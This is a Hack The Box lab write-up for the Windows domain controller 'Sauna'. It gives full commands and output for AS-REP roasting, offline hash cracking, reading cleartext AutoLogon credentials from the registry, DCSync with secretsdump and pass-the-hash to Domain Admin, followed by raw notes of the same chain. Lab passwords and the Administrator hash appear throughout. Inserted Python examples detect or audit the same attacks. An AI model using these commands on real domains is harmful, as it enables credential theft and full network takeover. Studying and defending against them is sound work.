Hack The Box · Lab
Easy · Windows · Active Directory · Kerberos

Target: 10.10.10.175 | Difficulty: Easy | OS: Windows | Domain: EGOTISTICAL-BANK.LOCAL

Environment Setup

export IP=10.10.10.175
export DOMAIN=EGOTISTICAL-BANK.LOCAL
echo "$IP sauna.egotistical-bank.local egotistical-bank.local" | sudo tee -a /etc/hosts

Step 1 — Port Scan & Service Enumeration

Why: Identify exposed services and confirm this is a Domain Controller with web and WinRM access.

nmap -sCV -p- --min-rate 5000 -oN sauna.nmap $IP

Output:

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

Key findings: Standard AD DC profile. HTTP (80) and WinRM (5985) are both exposed — worth enumerating the web service for usernames.

Step 2 — Web Reconnaissance & Username Generation

Why: The bank's public website may expose employee names that can be converted to valid AD username formats for a Kerberos attack.

# Browse http://$IP/about.html — the "Meet The Team" staff page lists:
# Fergus Smith, Shaun Coins, Hugo Bear, Bowie Taylor, Sophie Driver, Steven Kerb, Jenny Joy

# Generate common AD username formats:
cat > users.txt << 'EOF'
fsmith
scoins
hbear
btaylor
sdriver
skerb
jjoy
fergus.smith
shaun.coins
hugo.bear
bowie.taylor
sophie.driver
steven.kerb
jenny.joy
f.smith
s.coins
h.bear
smithf
EOF

Key findings: Seven employee names enumerated from the About page. Multiple AD username formats generated for AS-REP roast testing.

Step 3 — AS-REP Roasting

Why: If any accounts have Kerberos pre-authentication disabled, we can request an encrypted AS-REP ticket without credentials and crack it offline.

impacket-GetNPUsers $DOMAIN/ -usersfile users.txt -dc-ip $IP -no-pass -format hashcat

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:1c8f...e4a2$<hash>

Crack the AS-REP hash offline (mode 18200 = Kerberos 5 AS-REP, etype 23):

hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt --force

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23

Key findings: fsmith (Fergus Smith) has pre-authentication disabled. Cracked offline: fsmith:Thestrokes23.

Step 4 — WinRM Access as fsmith

Why: Port 5985 (WinRM) is open — if fsmith is in Remote Management Users, we get a shell directly.

evil-winrm -i $IP -u fsmith -p 'Thestrokes23'

Output:

Evil-WinRM shell v3.x
*Evil-WinRM* PS C:\Users\fsmith\Documents>
type C:\Users\fsmith\Desktop\user.txt

Key findings: Shell as fsmith. User flag captured.

Step 5 — AutoLogon Credential Discovery

Why: Windows AutoLogon stores service account credentials in the registry in cleartext — a common misconfiguration when a low-privilege account needs to log in automatically.

*Evil-WinRM* PS> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon"

Output:

DefaultDomainName    REG_SZ    EGOTISTICALBANK
DefaultUserName      REG_SZ    EGOTISTICALBANK\svc_loanmgr
DefaultPassword      REG_SZ    Moneymakestheworldgoround!

Key findings: AutoLogon configured with svc_loanmgr:Moneymakestheworldgoround! stored in plaintext.

Step 6 — BloodHound Enumeration as svc_loanmgr

Why: Map Active Directory ACL paths from svc_loanmgr to discover privilege escalation routes toward Domain Admin.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' \
  -d $DOMAIN -dc sauna.egotistical-bank.local -ns $IP --zip -c All
# BloodHound GUI → Mark svc_loanmgr as Owned
# Shortest Paths to Domain Admins:
# svc_loanmgr → GetChanges + GetChangesAll → EGOTISTICAL-BANK.LOCAL
# → DCSync rights!

Key findings: svc_loanmgr holds GetChanges and GetChangesAll rights on the domain object — full DCSync capability without touching LSASS.
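An added example, not from this writeup: the check that BloodHound's DCSync edge encodes, written out in Python over a constructed DACL of the domain object, so a defender can audit the same condition without the GUI. The ACE list, the allowlist and the principal names are assumed; the two GUIDs are the real DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights.

```python
# Replication control-access rights on the domain head. DCSync needs both.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All

# (principal, right, objectType GUID or None) as they would sit in the
# domain object's DACL. Constructed sample data, not collected from the box.
SAMPLE_ACES = [
    ("EGOTISTICAL-BANK\\Domain Controllers", "ExtendedRight", GET_CHANGES),
    ("EGOTISTICAL-BANK\\Domain Controllers", "ExtendedRight", GET_CHANGES_ALL),
    ("EGOTISTICAL-BANK\\Domain Admins", "GenericAll", None),
    ("EGOTISTICAL-BANK\\svc_loanmgr", "ExtendedRight", GET_CHANGES),
    ("EGOTISTICAL-BANK\\svc_loanmgr", "ExtendedRight", GET_CHANGES_ALL),
    ("EGOTISTICAL-BANK\\hsmith", "ExtendedRight", GET_CHANGES),
    ("EGOTISTICAL-BANK\\fsmith", "WriteDacl", None),
]

# Principals expected to replicate or to hold full control (assumed allowlist).
EXPECTED = {"EGOTISTICAL-BANK\\Domain Controllers", "EGOTISTICAL-BANK\\Domain Admins"}


def dcsync_capable(aces):
    """Map each principal to the reason it can DCSync; absent if it cannot.

    One replication right alone (hsmith) is not enough. GenericAll contains
    every extended right. WriteDacl/WriteOwner do not replicate by themselves
    but let the holder grant the rights to itself, so they are reported too.
    """
    ext = {}
    capable = {}
    for principal, right, guid in aces:
        if right == "GenericAll":
            capable[principal] = "GenericAll"
        elif right in ("WriteDacl", "WriteOwner"):
            capable.setdefault(principal, "can self-grant via " + right)
        elif right == "ExtendedRight" and guid:
            ext.setdefault(principal, set()).add(guid.lower())
    for principal, guids in ext.items():
        if {GET_CHANGES, GET_CHANGES_ALL} <= guids:
            capable[principal] = "GetChanges + GetChangesAll"
    return capable


def unexpected_dcsync(aces, expected=EXPECTED):
    """Principals with DCSync capability that are not on the allowlist."""
    return {p: why for p, why in dcsync_capable(aces).items() if p not in expected}
```

Anything returned by unexpected_dcsync is a finding to remove from the domain head's DACL; a service account should never appear there.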

Step 7 — DCSync → Dump Administrator Hash

Why: DCSync impersonates a Domain Controller replication request to extract NTLM hashes for any account directly from Active Directory.

impacket-secretsdump $DOMAIN/svc_loanmgr:'Moneymakestheworldgoround!'@$IP \
  -just-dc-user administrator

Output:

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Key findings: Administrator NT hash extracted: 823452073d75b9d1cf70ebdf86c7f98e.

Step 8 — Pass-the-Hash → Domain Admin

Why: WinRM accepts NTLM authentication — pass the Administrator hash directly without needing to crack it.

evil-winrm -i $IP -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents>
type C:\Users\Administrator\Desktop\root.txt

Key findings: Full Domain Admin access via pass-the-hash. Root flag captured.

Credentials

Username        Password / Hash                          Source
fsmith          Thestrokes23                             AS-REP Roast (KRB5 offline crack)
svc_loanmgr     Moneymakestheworldgoround!               AutoLogon registry (cleartext)
Administrator   823452073d75b9d1cf70ebdf86c7f98e (NT)    DCSync via svc_loanmgr

Full Attack Chain

Web Staff Page (/about.html)
        │
        ▼ Enumerate employee names → generate username wordlist
AS-REP Roast (GetNPUsers — no pre-auth on fsmith)
        │
        ▼ hashcat -m 18200 → Thestrokes23
fsmith:Thestrokes23
        │
        ▼ evil-winrm :5985
USER FLAG
        │
        ▼ reg query winlogon (AutoLogon plaintext)
svc_loanmgr:Moneymakestheworldgoround!
        │
        ▼ BloodHound → GetChanges + GetChangesAll on domain
DCSync Rights on EGOTISTICAL-BANK.LOCAL
        │
        ▼ secretsdump -just-dc-user administrator
Administrator:823452073d75b9d1cf70ebdf86c7f98e
        │
        ▼ evil-winrm -H (Pass-the-Hash)
DOMAIN ADMIN / ROOT FLAG

© 0xNRG — Sauna pwned — 2020-07-18

notes

Start off with nmap.

Basic scan:

```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown
```


Scan on the specific open ports with service/version detection:

```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 14:12:42Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-27T14:12:45
|_  start_date: N/A
|_clock-skew: 7h00m00s
```

HTTP (port 80)

[Screenshot: Screenshot_2025-07-27_at_9.24.19_AM.png]


Possible users?


[Screenshot: Screenshot_2025-07-27_at_9.26.13_AM.png]

SMB Anonymous Auth success

Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)

Guest access null

Anon/guest share enum null

LDAP Anonymous auth success

windapsearch


```shell
❯ py /root/offsec/tools/windapsearch/windapsearch.py -d $DOMAIN --dc-ip $IP -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users

[*] Bye!
```

RPC Anon Auth null

We collected users from the webpage and used usernames-generator.py.

Used kerbrute with the generated list and got a hash for FSmith due to no pre-auth on the account. It is encryption type $18.

$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:274c882102df475650885d34e854453d$...SNIP...

After running GetNPUsers.py we got the FSmith $23 TGT:

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67a11e6a2abbed3aa5c07d94d84f71e$...SNIP...

TGT Cracked with hashcat

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67...SNIP...3d:Thestrokes23
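An added defensive example, not from this writeup, covering the AS-REP roasting step in both the Step 3 section and these notes: Python that flags AS-REP roasting in constructed 4768 (Kerberos TGT request) events. PreAuthType 0 is a ticket issued without pre-authentication, which is exactly what GetNPUsers and kerbrute collected for fsmith, and the 0x17/0x12 encryption types map to the $23/$18 prefixes of the two hashes above. Field names follow the 4768 EventData schema; the log lines, IPs and severity scheme are assumed, and the DC must have "Audit Kerberos Authentication Service" enabled for 4768 to exist at all.

```python
import re
from collections import Counter

# TicketEncryptionType as logged in 4768 -> Kerberos etype number, i.e. the
# value that appears in the $krb5asrep$<etype>$ hash prefix.
ETYPE = {"0x17": 23, "0x12": 18, "0x11": 17}

# Constructed sample 4768 events in key=value form (not real DC logs).
SAMPLE_4768 = """\
EventID=4768 TargetUserName=fsmith TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=::ffff:10.10.14.2 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=hsmith TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=::ffff:10.10.14.2 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0
EventID=4768 TargetUserName=svc_loanmgr TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=::ffff:10.10.14.2 TicketEncryptionType=0x12 PreAuthType=2 Status=0x12
EventID=4768 TargetUserName=fsmith TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=::ffff:10.10.14.2 TicketEncryptionType=0x12 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=Administrator TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=::ffff:10.10.10.175 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0
"""


def parse_event(line):
    """Turn one flattened key=value event line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def asrep_roast_alerts(log_text):
    """One alert per successful 4768 issued without pre-authentication.

    PreAuthType=0 means the account has DONT_REQ_PREAUTH set and the KDC
    handed out an AS-REP to an unauthenticated requester, which is what the
    roasting tools crack offline. RC4 (etype 23) cracks far faster than AES
    (etype 18), so it is rated higher.
    """
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue  # failed requests carry no crackable material
        if ev.get("PreAuthType") != "0":
            continue
        etype = ETYPE.get(ev.get("TicketEncryptionType"))
        alerts.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"],
            "etype": etype,
            "severity": "high" if etype == 23 else "medium",
        })
    return alerts


def roastable_accounts(log_text):
    """Accounts observed being roasted, with how many AS-REPs each leaked."""
    return Counter(a["user"] for a in asrep_roast_alerts(log_text))
```

The fix on the account side is clearing "Do not require Kerberos preauthentication" on every user roastable_accounts reports, and disabling RC4 for the domain so any remaining AS-REPs are AES-keyed.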

Authenticating as fsmith from here on.

SMB user enum

```shell
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr
```


Share enum (as fsmith):


```shell
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
print$          READ            Printer Drivers
RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SYSVOL          READ            Logon server share
```


Write permission on the RICOH share, but the directory doesn't exist.


SMB RID brute force, filtered with awk for `SidTypeUser`:


```shell
Administrator
Guest
krbtgt
SAUNA$
HSmith
FSmith
svc_loanmgr
```

None of the remaining users are AS-REP roastable (pre-auth is enforced on them).

WinRM

```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)
```


```shell
❯ evil-winrm -i $IP -u $USER -p $PASS
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```

PRIVESC

Uploaded `winPEASx64.exe` to the target.

```shell
╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

Bloodhound

[Screenshot: Screenshot_2025-07-27_at_11.22.53_AM.png]

[Screenshot: Screenshot_2025-07-27_at_11.23.24_AM.png]


Let's use secretsdump:


```shell
❯ secretsdump.py $DOMAIN/$USER:$PASS@$IP -just-dc-user Administrator

...SNIP...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
```
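An added detection example, not from this writeup, for the DCSync step shown here and in Step 7: the secretsdump call above is a DRSUAPI replication request, which a DC with "Audit Directory Service Access" enabled and a SACL on the domain object records as a 4662 with the replication GUIDs in its Properties field. The Python below flags such events from anything other than a DC machine account; the sample events, the flattened key=value layout and the DC allowlist are constructed.

```python
import re

# Replication control-access rights that show up in a 4662 Properties field
# when a DRSGetNCChanges (DCSync) request is serviced for the domain NC.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All

# Accounts allowed to replicate: the DCs' machine accounts (assumed allowlist).
DC_ACCOUNTS = {"SAUNA$"}

# Constructed sample 4662 events, each flattened to one key=value line.
SAMPLE_4662 = """\
EventID=4662 SubjectUserName=SAUNA$ SubjectDomainName=EGOTISTICALBANK AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=svc_loanmgr SubjectDomainName=EGOTISTICALBANK AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=fsmith SubjectDomainName=EGOTISTICALBANK AccessMask=0x10 Properties={bf967a86-0de6-11d0-a285-00aa003049e2}
"""


def parse_event(line):
    """Turn one flattened key=value event line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def dcsync_alerts(log_text, dc_accounts=DC_ACCOUNTS):
    """Alerts for replication-right use by anything but a DC account.

    AccessMask 0x100 is Control Access (an extended right); together with a
    replication GUID in Properties it is the DCSync signature. A user or
    service account such as svc_loanmgr has no legitimate reason to send one.
    """
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4662" or ev.get("AccessMask") != "0x100":
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for name, guid in (("GetChanges", GET_CHANGES),
                                          ("GetChangesAll", GET_CHANGES_ALL))
                  if guid in props]
        if not rights or ev["SubjectUserName"].upper() in dc_accounts:
            continue
        alerts.append({"user": ev["SubjectUserName"],
                       "domain": ev["SubjectDomainName"],
                       "rights": rights})
    return alerts
```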

We have the Administrator hash.

Let’s pass the hash


```shell
❯ evil-winrm -i $IP -u $USER -H $HASH
                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
```

Let's use psexec as well:

```shell
❯ psexec.py $DOMAIN/$USER@$IP -hashes $HASH

C:\Windows\system32> whoami
nt authority\system
```